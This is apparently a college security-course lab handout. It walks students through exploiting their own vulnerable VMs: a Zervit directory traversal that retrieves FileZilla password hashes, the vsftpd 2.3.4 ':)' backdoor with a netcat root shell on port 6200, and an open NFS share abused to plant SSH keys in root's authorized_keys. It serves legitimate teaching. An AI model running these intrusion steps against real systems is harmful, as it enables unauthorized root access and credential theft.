Project 11: Exploiting Win2008-124 and Metasploitable (20 pts.)

What You Need

The three virtual machines you made earlier:

Purpose

To practice several exploitation techniques.

Task 1: File Traversal (5 pts.)

Start the Win2008-124 Target

Start the VM. A box pops up, starting Zervit.

Enter a port number od 3232 and press Enter.

Answer the question with Y, as shown below.

On the Win2008-124 machine, open a new Command Prompt and execute the IPCONFIG command. Find its IP address.

Viewing the Zervit Page

On some other computer, such as your host machine, open a Web browser and enter the IP address of your Win2008-124 machine, followed by :3232

A "Zervit Dir Listing" page opens, as shown below.

In the Zervit page, click HxD. Click changelog.txt

A page of text opens, as shown below.

Append this to the end of the URL:

?../../../../
A directory appears, as shown below.

This the root of C:, which contains objects like Boot, config.sys, and "Documents and Settings".

Append this to the end of the URL, as shown below.

xampp/FileZillaFTP/FileZilla%20Server.xml

When you open that URL, a file downloads. The file is named "changelog.txt" but it actually contains the FileZilla configuration file.

Open that file in a text editor. It contains passwords hashed with MD5, as shown below.

Capturing a Screen Image

Make sure an MD5 Password Hash is visible, as shown above.

Capture a whole-desktop image and save it as "Proj 11a from YOURNAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Turning Off the Win2008-124 Machnie

If you wish, you can turn the Win2008-124 VM off now.

Task 2: Smileyface Backdoor (5 pts.)

Starting Metasploitable

Start your Metasploitable VM. Log in as msfadmin with a password of msfadmin

Execute ifconfig and make a note of its IP address.

Starting Kali

Start your Kali VM. Make sure it can ping Metasploitable.

Scanning the Metasploitable Target with Nmap

From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nmap -A -p20-21 172.16.1.190
Nmap finds vsftpd 2.3.4, as shown below.

Understanding the Backdoor Googling vsftpd 2.3.4 quickly shows articled explaining the backdoor, as shown below.

Installing FTP

If you try to use command-line FTP in Kali, it fails, as shown below.

On Kali, in a Terminal window, execute these commands:

apt-get update
apt install ftp -y
FTP installs, as shown below.

Connecting with FTP

On Kali, in a Terminal window, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
ftp 172.16.1.190
Enter a username of
aa:)
and type anything for the passwprd.

There is no response--the login seems to hang, as shown below.

Open a new Terminal window and execute this command, replacing the IP address with the IP address of your Metasploitable machine.

nc 172.16.1.190 6200
There is no prompt, but you have a shell. To see that, execute these commands:
whoami
uname -a
You're root on metasploitable, as shown below.

Capturing a Screen Image

Make sure these required items are visible, as shown above:

Capture a whole-desktop image and save it as "Proj 11b from YOURNAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT


Task 3: Exploiting NFS and SSH (10 pts.)

Scanning the Metasploitable Target with Nmap

From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
nmap -A 172.16.1.190
Nmap produces several screens of output.

Find the results for port 111. It detected nfs, as shown below.

Enumerating NFS

NFS (Network File Sharing) is used by Linux to share files.

Nmap has a script to enumerate them.

From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.

nmap --script-help nfs-ls
Read the output to learn more about the script, as shown below.

From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.

nmap --script=nfs-ls 172.16.1.190
The volume / is shared, with "Read" and "Modify" permissions, as shown below.

Mouting the NFS Share

From your Kali machine, in a Terminal, execute these commands, replacing the IP address with the IP address of your Metasploitable machine.

These commands install some software needed to use nfs shares, and mount the shared folder on your Kali system in the /tmp folder.

apt-get update
apt-get install nfs-common -y
mkdir /tmp/mount
mount -t nfs 172.16.1.190:/ /tmp/mount -o nolock
cd /tmp/mount
ls
You see all the folders expected at the root of a Linux system, as shown below.

From your Kali machine, in a Terminal, execute these commands to find the SSH keys for the "msfadmin" user.

cd home
cd msfadmin
ls -al
cd .ssh
ls -l
Three files are found, as shown below.

Let's look at these files.

From your Kali machine, in a Terminal, execute these commands.

ls
cat authorized_keys
The authorized_keys file contains public keys of authorized users, as shown below.

Generating SSH Keys

To exploit the Metasploitable box, we'll add our public SSH key to the authorized_keys file. So first we need to generate keys.

From your Kali machine, in a Terminal, execute this command:

ssh-keygen
The keys are generated and placed in the /root/.ssh directory, as shown below.

Adding Your Public Key to authorized_keys

From your Kali machine, in a Terminal, execute these commands:
cat /root/.ssh/id_rsa.pub >> ./authorized_keys
cat authorized_keys
Your key appears at the end of the file, as shown below.

Connecting via SSH

From your Kali machine, in a Terminal, execute this command, replacing the IP address with the IP address of your Metasploitable machine.
ssh msfadmin@172.16.1.190
You get a shell as the "msfadmin" user, as shown below.

Adding Your Public Key to Root's authorized_keys

To get root access, all you need to do is add that public key to the root user's authorized_keys file.

From your Kali machine, in a Terminal, execute these commands, replacing the IP address with the IP address of your Metasploitable machine.

cd /tmp/mount/root/.ssh
cat /root/.ssh/id_rsa.pub >> ./authorized_keys
ssh root@172.16.1.190
whoami
Your get a root shell, as shown below.

Capturing a Screen Image

Make sure these two lines are visible, as shown above:

root@metasploitable:~# whoami
root
Capture a whole-desktop image and save it as "Proj 11c from YOURNAME".

YOU MUST SEND IN A WHOLE-DESKTOP IMAGE FOR FULL CREDIT

Turning in Your Project

Email the images to cnit.124@gmail.com with a subject line of "Proj 1x From YOUR NAME", replacing "YOUR NAME" with your real name.

Send a Cc to yourself.

Last Modified: 10-31-17